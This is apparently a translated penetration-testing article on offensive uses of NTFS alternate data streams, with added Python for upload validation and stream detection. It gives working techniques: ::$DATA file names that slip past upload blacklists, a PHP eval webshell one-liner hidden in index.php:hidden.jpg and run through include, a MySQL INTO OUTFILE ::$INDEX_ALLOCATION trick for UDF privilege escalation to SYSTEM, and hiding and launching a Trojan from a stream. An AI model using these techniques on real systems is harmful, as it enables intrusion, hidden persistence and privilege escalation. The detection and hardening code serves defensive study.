For a brief introduction to NTFS alternate data streams (ADS), see http://www.xfocus.net/articles/200212/466.html
ADS have drawn the attention of security people for a long time, and some classic uses have been published, such as hiding files and hiding webshells (http://blog.csdn.net/lake2/article/details/269659). With the recent IIS permission bypass, we tested the use of ADS during penetration testing again and found some more interesting behaviour.
1 Classic IIS directory access permission bypass:
See: http://www.exploit-db.com/exploits/19033/
Note: the permissions bypassed here are NTFS permissions set on the directory (its security properties), not a direct bypass of the site's admin backend. Don't get that wrong.
2 Bypassing blacklist checks
In testing we found that if the uploaded file name is test.php::$DATA, the server creates a file test.php whose content is identical to the uploaded content, and PHP parses it. Suppose the file we upload contains <?php phpinfo(); ?>. The table below shows what happens for each name we tried:
Uploaded file name            | What happens on the server       | Content of the generated file
------------------------------+----------------------------------+------------------------------
test.php:a.jpg                | test.php is created              | empty
test.php::$DATA               | test.php is created              | <?php phpinfo(); ?>
test.php::$INDEX_ALLOCATION   | test.php is created as a folder  | (directory)
test.php::$DATA\0.jpg         | 0.jpg is created                 | <?php phpinfo(); ?>
test.php::$DATA\aaa.jpg       | aaa.jpg is created               | <?php phpinfo(); ?>
PS: uploading test.php:a.jpg really does create a named data stream on the server; you can view its content with notepad test.php:a.jpg, and it is normal for test.php itself to be empty.
Using the second row, we can bypass some blacklist checks: the check sees an extension that is not on its list (.php::$DATA), but NTFS writes the content to the unnamed stream of test.php.
I also tried appending something after ::$DATA to truncate the name, but found that Windows keeps only the part after the last "/" or "\": it treats those characters as directory separators, and the upload handler only ever sees the final file name, which is why 0.jpg and aaa.jpg are what gets created.
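The following is an added example, not code from the original post. It models the upload names in the table above: Windows keeps only the last path component, a name:stream:$type suffix is split off, a $INDEX_ALLOCATION stream yields a directory, and content written to a named stream leaves the main file empty. It then shows the blacklist check the post describes (extension of the raw name) beside a hardened check that rejects stream syntax and tests the name Windows would actually create. The blacklist, the sample names and the predict_outcome model are my assumptions, not the post's code.

```python
import os

# Stream types NTFS uses for the cases in the table above.
DATA_STREAM = "$DATA"
DIR_STREAM = "$INDEX_ALLOCATION"

# Assumed blacklist of a typical upload handler (not from the original post).
BLACKLIST = {".php", ".php3", ".phtml", ".asp", ".aspx", ".jsp"}


def windows_basename(name: str) -> str:
    """Windows treats both '\\' and '/' as directory separators and an upload
    handler only ever sees the last path component, so that is what gets created."""
    return name.replace("\\", "/").rsplit("/", 1)[-1]


def parse_stream_name(name: str):
    """Split the Win32 'file:stream:$type' form into (file, stream, type).

    The unnamed '$DATA' stream is the file's normal content, so
    'test.php' and 'test.php::$DATA' name the same thing.
    """
    parts = windows_basename(name).split(":")
    file_name = parts[0]
    stream = parts[1] if len(parts) > 1 else ""
    stream_type = parts[2].upper() if len(parts) > 2 and parts[2] else DATA_STREAM
    return file_name, stream, stream_type


def predict_outcome(upload_name: str, content: str) -> dict:
    """Model (assumption, matching the table above) of what the upload creates
    and what the main, unnamed data stream of the created object holds."""
    file_name, stream, stream_type = parse_stream_name(upload_name)
    if stream_type == DIR_STREAM:
        return {"created": file_name, "kind": "directory", "main_content": None}
    if stream:
        # Bytes go into file:stream; the file itself exists but stays empty.
        return {"created": file_name, "kind": "file", "main_content": ""}
    return {"created": file_name, "kind": "file", "main_content": content}


def naive_extension_check(upload_name: str) -> bool:
    """The check that gets bypassed: it looks at the extension of the raw
    name, and 'test.php::$DATA' has the extension '.php::$DATA'."""
    ext = os.path.splitext(upload_name)[1].lower()
    return ext not in BLACKLIST


def hardened_check(upload_name: str) -> bool:
    """Reject any name carrying stream syntax, then check the extension of the
    name Windows would actually create (an allowlist is better still)."""
    if ":" in upload_name:  # no legitimate upload name needs a stream suffix
        return False
    base = windows_basename(upload_name)
    if base in ("", ".", ".."):
        return False
    ext = os.path.splitext(base)[1].lower()
    return ext not in BLACKLIST


if __name__ == "__main__":
    PHP = "<?php phpinfo(); ?>"
    # Constructed names: the rows of the table above.
    for name in ("test.php:a.jpg", "test.php::$DATA", "test.php::$INDEX_ALLOCATION",
                 "test.php::$DATA\\0.jpg", "test.php::$DATA\\aaa.jpg"):
        print(f"{name:30} naive={naive_extension_check(name)!s:5} "
              f"hardened={hardened_check(name)!s:5} -> {predict_outcome(name, PHP)}")
```

Note the naive check passes every row except a plain test.php, while the hardened check rejects all of them; the \0.jpg and \aaa.jpg rows would pass a check that only stripped the stream suffix, because they rely on the path separator, not the colon.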
3 Using ADS to hide a webshell:
Method: echo a one-liner into a data stream of an existing file on the server. If index.php is a normal page, we can do: echo ^<?php @eval($_REQUEST[cmd]);?^> > index.php:hidden.jpg (the ^ escapes < and > for cmd).
This creates an invisible shell in the stream hidden.jpg: the regular file manager, the type command, the dir command and the del command find no hidden.jpg (dir /R on Vista and later does list streams, so that is the check to run on a suspect host). We then include the stream from a normal file: <?php include('index.php:hidden.jpg'); ?>, and in this way the one-liner is parsed normally.
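As an added example for the detection side, not code from the original post: the stream that dir, type and del miss is visible through the Win32 API, and the script below enumerates the streams of a file with FindFirstStreamW/FindNextStreamW via ctypes (Windows only; the API signatures and struct layout are stated from the Win32 documentation, and the constructed entry list in the helper shows how the unnamed ::$DATA stream is filtered out). The file name index.php and the stream name hidden.jpg are taken from the text above.

```python
import ctypes
import sys

MAX_PATH = 260


class WIN32_FIND_STREAM_DATA(ctypes.Structure):
    # Layout from the Win32 header: a 64-bit size, then the stream name.
    _fields_ = [("StreamSize", ctypes.c_longlong),
                ("cStreamName", ctypes.c_wchar * (MAX_PATH + 36))]


def list_streams(path: str):
    """Return [(stream_name, size)] for every stream of `path`, e.g.
    [('::$DATA', 120), (':hidden.jpg:$DATA', 33)]. Windows/NTFS only."""
    if sys.platform != "win32":
        raise OSError("NTFS stream enumeration needs the Win32 API")
    k32 = ctypes.WinDLL("kernel32", use_last_error=True)
    k32.FindFirstStreamW.argtypes = [ctypes.c_wchar_p, ctypes.c_int,
                                     ctypes.c_void_p, ctypes.c_uint32]
    k32.FindFirstStreamW.restype = ctypes.c_void_p
    k32.FindNextStreamW.argtypes = [ctypes.c_void_p, ctypes.c_void_p]
    k32.FindNextStreamW.restype = ctypes.c_int
    k32.FindClose.argtypes = [ctypes.c_void_p]

    data = WIN32_FIND_STREAM_DATA()
    FIND_STREAM_INFO_STANDARD = 0
    handle = k32.FindFirstStreamW(path, FIND_STREAM_INFO_STANDARD,
                                  ctypes.byref(data), 0)
    if handle == ctypes.c_void_p(-1).value:  # INVALID_HANDLE_VALUE
        raise ctypes.WinError(ctypes.get_last_error())
    streams = []
    try:
        while True:
            streams.append((data.cStreamName, data.StreamSize))
            if not k32.FindNextStreamW(handle, ctypes.byref(data)):
                break  # ERROR_HANDLE_EOF: no more streams
    finally:
        k32.FindClose(handle)
    return streams


def hidden_streams(entries):
    """Keep only named streams: '::$DATA' is the file's ordinary content."""
    return [name for name, _size in entries if name != "::$DATA"]


def stream_path(file_path: str, stream_name: str) -> str:
    """Turn an enumerated name like ':hidden.jpg:$DATA' into the path that
    type/notepad/include() open: 'index.php:hidden.jpg'."""
    suffix = ":$DATA"
    name = stream_name[:-len(suffix)] if stream_name.endswith(suffix) else stream_name
    return file_path if name == ":" else file_path + name


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "index.php"
    try:
        entries = list_streams(target)
    except OSError as err:
        # Constructed sample, labelled as such, so the filtering can be shown off-Windows.
        print(f"enumeration unavailable ({err}); using a constructed sample")
        entries = [("::$DATA", 120), (":hidden.jpg:$DATA", 33)]
    for name in hidden_streams(entries):
        print("hidden stream:", stream_path(target, name))
```

Run it against the web root's files on the host (for example in a loop over *.php); any named stream on a PHP or HTML file is worth opening with type, since a page file has no legitimate reason to carry one.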
4 Using ADS in UDF privilege escalation
UDF privilege-escalation tip: if the database user has INSERT and DELETE privileges on the mysql database (note: the database named mysql, which exists by default), it can create a function that loads a custom DLL. Because MySQL on Windows usually runs with SYSTEM privileges, a user-defined function lets us execute commands as SYSTEM.
From MySQL 5.1 onward (most installs are 5.6 now; older versions are rare), the DLL for a user-defined function must be in the plugin directory, lib\plugin under the MySQL installation. Dropping it into C:\windows\system32 no longer works: the DLL is not loaded and CREATE FUNCTION fails. Sadly, a default installation of 5.1 and later does not have a lib\plugin directory at all, unless you install the full package (the official 200 MB+ one).
There are situations where this matters: you have a webshell, but its permissions are locked down so that you cannot create a lib\plugin directory; or you have no webshell at all, only a MySQL weak password (http://blog.sina.com.cn/s/blog_6ca7b58101013kt4.html). Previously you would give up at this point, but with ADS we can get around the limitation, because writing to a path whose last component ends in ::$INDEX_ALLOCATION creates a directory instead of a file.
Demo:
select 'xxx' into outfile 'd:\\mysql\\lib::$INDEX_ALLOCATION';
A lib directory is created in the MySQL directory. Run the same statement again against lib\plugin to create the plugin subdirectory, then write the DLL there and CREATE FUNCTION as usual. (On newer MySQL builds, secure_file_priv restricts where INTO OUTFILE may write, so check that setting first.)
5 Using ADS to hide a Trojan
Hiding is easy; run this directly in cmd: type muma.exe > test.txt:muma.exe
This writes the Trojan into a data stream of test.txt. To run it, however, you still need another tool. WinRAR is one: the method is described on Baidu Baike, though whether it works is uncertain, and it needs the type command to write the binary executable into the stream.
I still do not think a WinRAR self-extracting Trojan is reliable: its suffix is still .exe, and if the target cannot be sure even of that, you might as well send muma.exe directly. So I did not research this use further.
Note: if the data stream holds an executable, it can be launched with the start command (start test.txt:muma.exe) on Windows XP and 2003; Windows 7 no longer allows this.